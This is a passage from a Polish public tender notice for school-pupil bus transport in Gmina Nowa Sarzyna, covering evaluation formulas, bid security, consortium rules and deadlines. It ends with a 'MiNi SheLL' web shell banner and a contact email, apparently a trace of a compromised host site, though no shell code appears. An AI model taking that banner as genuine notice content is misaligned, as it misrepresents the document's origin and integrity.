uwagę wskazówki opiekuna.<br/><br/>12. Pojazdy, którymi Wykonawca będzie świadczył usługi muszą posiadać ubezpieczenie OC i NNW oraz muszą być utrzymywane w czystości. Wykonawca ponosi odpowiedzialność za szkody wynikające z naruszenia zasad bezpieczeństwa ruchu drogowego oraz za nie zapewnienie uczniom i opiekunom odpowiednich warunków bezpieczeństwa i higieny w czasie przejazdu.<br/><br/>13. W zimie każdy pojazd musi posiadać ogrzewanie wewnętrzne oraz ogumienie zimowe. Stopnie wejściowe powinny być oczyszczone z ewentualnego oblodzenia, tak by były bezpieczne. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2024-09-09 do 2025-05-16</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert przyznając punkty w oparciu o następujące kryteria oceny ofert:<br/>1) Cena – (C) – waga 60%,<br/>2) Czas podstawienia autobusu zastępczego w razie awarii – (T) – waga 40%.<br/><br/>2. Sposób oceny ofert.<br/>1) Zasady oceny za kryterium „Cena”:<br/>a) Punkty za kryterium „Cena” (C) zostaną obliczone w następujący sposób:<br/><br/>C = C(of._min) / C(of._bad) × 60 pkt<br/><br/>gdzie:<br/>C – ilość punktów, jakie otrzyma badana oferta za kryterium „Cena”,<br/>C(of._min) – najniższa cena spośród ofert nie podlegających odrzuceniu,<br/>C(of._bad) – cena oferty badanej.<br/><br/>b) W kryterium „Cena” oferta z najniższą ceną otrzyma 60 pkt. natomiast pozostałe oferty po przeliczeniu zgodnie z powyższym wzorem odpowiednio mniej. <br/><br/>2) Zasady oceny za kryterium „Czas podstawienia autobusu zastępczego w razie awarii”.<br/>a) Punkty za kryterium „Czas podstawienia autobusu zastępczego w razie awarii – (T)” zostaną obliczone w następujący sposób:<br/><br/>Najkrótszy czas podstawienia autobusu zastępczego w razie awarii otrzyma 40 pkt, pozostałe proporcjonalnie mniej wg następującego przelicznika:<br/><br/>T = 40 pkt - [(Tw - 10) x 2 pkt] <br/><br/>gdzie:<br/>T – ilość punktów przyznanych Wykonawcy w kryterium czas podstawienia autobusu zastępczego w razie awarii<br/>Tw – czas podstawienia autobusu zaoferowany przez ocenianego Wykonawcę<br/><br/>b) Czas podstawienia autobusu zastępczego w razie awarii będzie liczony w pełnych minutach.<br/>c) Zamawiający określa minimalny oraz maksymalny czas podstawienia autobusu zastępczego w razie awarii w przedziale od 10 minut do 30 minut.<br/>d) Dla potrzeb oceny punktowej zaoferowany czas podstawienia pojazdu zastępczego w razie awarii krótszy niż 10 minut traktowany będzie jako czas równy 10 minut. <br/>e) Jeżeli Wykonawca zaproponuje czas podstawienia autobusu zastępczego w razie awarii dłuższy niż 30 minut Zamawiający ofertę odrzuci.<br/>f) W przypadku gdy Wykonawca w ogóle nie wskaże w ofercie oferowanego czasu podstawienia autobusu zastępczego w razie awarii Zamawiający uzna, iż Wykonawca nie przewiduje podstawiania autobusu zastępczego w razie awarii i ofertę odrzuci.<br/><br/>3. Za najkorzystniejszą ofertę zostanie uznana oferta, która otrzyma największą ilość punktów obliczoną na podstawie wzoru:<br/><br/>Px = Cx + Tx<br/><br/>gdzie:<br/>Px – ilość punktów, które otrzyma oferta „x”,<br/>Cx – ilość punktów, które otrzyma oferta „x” za kryterium „Cena”,<br/>Tx – ilość punktów, które otrzyma oferta „x” za kryterium „Czas podstawienia autobusu zastępczego w razie awarii”<br/><br/>4. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana jako najkorzystniejsza w zakresie poszczególnych części zamówienia. Oferta może uzyskać maksymalnie 100 pkt. w każdej z części zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu zastępczego w razie awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą się ubiegać Wykonawcy, którzy spełniają warunki, dotyczące:<br/><br/>1) Zdolności do występowania w obrocie gospodarczym.<br/><br/>Zamawiający nie określa wymagań w zakresie spełniania tego warunku.<br/><br/>2) Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.<br/><br/>Wykonawca spełni warunek jeżeli wykaże, że posiada aktualną licencję na wykonywanie transportu drogowego osób, zgodnie z ustawą z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. z 2024 r. poz. 728 z późn. zm.). <br/><br/>3) Sytuacji ekonomicznej lub finansowej.<br/><br/>Zamawiający nie określa wymagań w zakresie spełniania tego warunku.<br/> <br/>4) Zdolności technicznej lub zawodowej.<br/><br/>Zamawiający nie określa wymagań w zakresie spełniania tego warunku. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Wykonawcy wraz z ofertą składają aktualne na dzień składania ofert oświadczenie o niepodleganiu wykluczeniu z postępowania, wg załącznika nr 1 do SWZ.<br/><br/>2. Po dokonaniu wstępnej oceny ofert Zamawiający nie będzie wymagał od Wykonawcy, którego oferta została najwyżej oceniona, złożenia podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Wykonawcy wraz z ofertą składają aktualne na dzień składania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu, wg załącznika nr 1 do SWZ.<br/><br/>2. Po dokonaniu wstępnej oceny ofert Zamawiający będzie żądał od Wykonawcy, którego oferta została najwyżej oceniona do złożenia następujących podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu:<br/>1) dokumenty potwierdzające posiadanie przez Wykonawcę zezwolenia, licencji, koncesji lub potwierdzenia wpisu do rejestru działalności regulowanej lub dokumentu potwierdzającego, że Wykonawca jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawionego nie wcześniej niż 6 miesięcy przed jego złożeniem (zgodnie z pkt. 8.2.2 SWZ).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: <br/>1) w zakresie części 1 zamówienia - 1 400,00 zł (słownie: jeden tysiąc czterysta złotych 00/100),<br/>2) w zakresie części 2 zamówienia - 1 300,00 zł (słownie: jeden tysiąc trzysta złotych 00/100),<br/>3) w zakresie części 3 zamówienia - 1 300,00 zł (słownie: jeden tysiąc trzysta złotych 00/100),<br/>4) w zakresie części 4 zamówienia - 900,00 zł (słownie: dziewięćset złotych 00/100),<br/>5) w zakresie części 5 zamówienia - 1 600,00 zł (słownie: jeden tysiąc sześćset złotych 00/100).<br/><br/>2. Wadium należy wnieść w jednej lub kilku następujących formach przewidzianych w art. 97 ust. 7 ustawy Pzp, tj.:<br/>1) pieniądzu,<br/>2) gwarancjach bankowych,<br/>3) gwarancjach ubezpieczeniowych,<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2024 r. poz. 419), zwanej dalej: „ustawa o utworzeniu PARP”.<br/><br/>3. Wykonawca zobowiązany jest wnieść wadium przed upływem terminu składania ofert, o którym mowa w pkt. 18.11 SWZ, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne, w przypadku uznania rachunku Zamawiającego (wpływ na konto Zamawiającego). Wadium wnoszone w pieniądzu powinno fizycznie znajdować się na koncie Zamawiającego przed upływem terminu składania ofert pod rygorem odrzucenia oferty (art. 226 ust. 1 pkt 14 ustawy Pzp). Do oferty należy dołączyć dokument potwierdzający przelew (wniesienie) środków na rachunek Zamawiającego.<br/><br/>4. Wadium wnoszone w pieniądzu należy przelać na rachunek bankowy wskazany przez Zamawiającego:<br/>Nadsański Bank Spółdzielczy <br/>nr konta 27 9430 0006 1000 1182 2000 0003<br/>z adnotacją: „Wadium –	Dowóz dzieci i uczniów z terenu Gminy Nowa Sarzyna do przedszkoli, szkół i ośrodka edukacyjnego oraz na zajęcia sportowe w roku szkolnym 2024/2025 – w zakresie części nr …”.<br/><br/>5. W przypadku wniesienia wadium w formie innej niż pieniężna, Zamawiający wymaga złożenia wraz z ofertą oryginału dokumentu wadialnego (gwarancji lub poręczenia) w postaci elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym wystawcy gwarancji/poręczenia.<br/><br/>6. Dokumenty wniesione w jednej z form wymienionych w pkt. 2 ppkt. 2-4 muszą zawierać w swojej treści nieodwołalne, bezwarunkowe i płatne na pierwsze pisemne żądanie Zamawiającego zobowiązanie wystawcy dokumentu do zapłaty na rzecz Zamawiającego kwoty wadium, muszą być sporządzone zgodnie z obowiązującymi przepisami i powinny zawierać następujące elementy:<br/>a) nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta lub poręczyciela (banku lub instytucji ubezpieczeniowej udzielającej gwarancji) oraz wskazanie ich siedzib,<br/>b) określenie wierzytelności, która ma być zabezpieczona gwarancją/poręczeniem,<br/>c) kwotę gwarancji,<br/>d) termin ważności gwarancji/poręczenia w formule: „od dnia …….– do dnia ………”,<br/>e) zobowiązanie gwaranta/poręczyciela do zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego w sytuacjach określonych w art. 98 ust. 6 ustawy Pzp.<br/><br/>7. Wadium wnoszone w formie określonej w pkt. 5 nie może zawierać informacji, iż „gwarancja wygasa w momencie zwrotu oryginału dokumentu”.<br/><br/>8. Wadium musi zabezpieczać ofertę przez cały okres związania ofertą, począwszy od dnia, w którym upływa termin składania ofert.<br/><br/>9. Zamawiający odrzuca ofertę jeżeli Wykonawca nie wniósł wadium lub wniósł w sposób nieprawidłowy, nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt. 3 ustawy Pzp.<br/><br/>10. Ze względu na ograniczoną liczbę znaków, które można wprowadzić do treści ogłoszenia, pozostałe informacje zostały zawarte w rozdziale 15 SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/><br/>2. Przepisy dotyczące wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>3. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, żaden z nich nie może podlegać wykluczeniu z powodu niespełniania warunków, o których mowa w rozdziale 7 SWZ, natomiast spełnianie warunków udziału w postępowaniu, o których mowa w rozdziale 8 SWZ muszą zostać spełnione przez Wykonawców łącznie.<br/><br/>4. W przypadku, o którym mowa w pkt. 1, Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo lub inny dokument ustanawiający pełnomocnika winno być załączone do oferty. <br/>Pełnomocnictwo winno:<br/>a) określać do jakiego postępowania ma zastosowanie,<br/>b) wskazywać pełnomocnika oraz zakres jego umocowania,<br/>c) zawierać nazwę z określeniem adresu i siedziby wszystkich Wykonawców ubiegających się wspólnie o udzielenie niniejszego zamówienia.<br/><br/>5. Zaleca się, aby Pełnomocnikiem był jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/><br/>6. Dokument pełnomocnictwa musi być podpisany przez wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia. Podpisy muszą być złożone przez osoby uprawnione do składania oświadczeń woli wymienione we właściwym rejestrze.<br/><br/>7. Pełnomocnictwo lub inny dokument ustanawiający pełnomocnika przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym. W przypadku gdy pełnomocnictwo zostało sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym, poświadczające zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Przez cyfrowe odwzorowanie należy rozumieć dokument elektroniczny będący kopią elektroniczną treści zapisanej w postaci papierowej, umożliwiający zapoznanie się z tą treścią i jej zrozumienie, bez konieczności bezpośredniego dostęp u do oryginału.<br/><br/>8. Pełnomocnik pozostaje w kontakcie z Zamawiającym, w toku postępowania zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję itp.<br/><br/>9. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) oświadczenie, o którym mowa w pkt. 9.1 ppkt. 3 SWZ składa z ofertą każdy z Wykonawców wspólnie ubiegających się o zamówienie,<br/>b) do oferty dołączają oświadczenie, o którym mowa w pkt. 9.1 ppkt. 5) SWZ (w przypadku, o którym mowa w pkt. 8.7 SWZ). Oświadczenie to jest podmiotowym środkiem dowodowym,<br/>c) na wezwanie Zamawiającego zobowiązani są do złożenia podmiotowych środków dowodowych, o których mowa w pkt. 9.2 SWZ, przy czym podmiotowe środki dowodowe, o których mowa:<br/>- w pkt. 9.2.1 SWZ składa odpowiednio Wykonawca, który wykazuje spełnianie warunku, w zakresie i na zasadach opisanych w pkt. 8.2 SWZ.<br/><br/>10. Wspólnicy spółki cywilnej/uczestnicy konsorcjum są traktowani jak Wykonawcy składający ofertę wspólną.<br/><br/>11. Przed podpisaniem umowy (w przypadku wyboru oferty wspólnej jako najkorzystniejszej) Wykonawcy składający ofertę wspólną mają obowiązek przedstawić Zamawiającemu umowę konsorcjum/umowę spółki cywilnej. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zamawiający dopuszcza możliwość wprowadzenia zmian do zawartej umowy na podstawie art. 454-455 ustawy Pzp oraz postanowień § 13 projektu umowy.<br/><br/>2. Nie stanowi zmiany umowy w rozumieniu art. 454 ustawy Prawo zamówień publicznych:<br/>1) zmiany danych teleadresowych,<br/>2) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr rachunku bankowego),<br/>3) zmiana wynagrodzenia niepowodująca przekroczenia kwoty wynagrodzenia umownego określonej w § 7 ust. 3 projektu umowy.<br/><br/>3. Zmiany do umowy może inicjować zarówno Zamawiający jak i Wykonawca, składając pisemny wniosek do drugiej Strony, zawierający w szczególności opis zmiany i jej uzasadnienie. Wszelkie istotne zmiany treści umowy wymagają zgody obydwu stron i formy pisemnej pod rygorem nieważności. Wprowadzenie zmian nieistotnych w umowie wymagają formy pisemnej pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-07-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z załącznikami należy złożyć za pośrednictwem Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-07-05 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-08-03</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com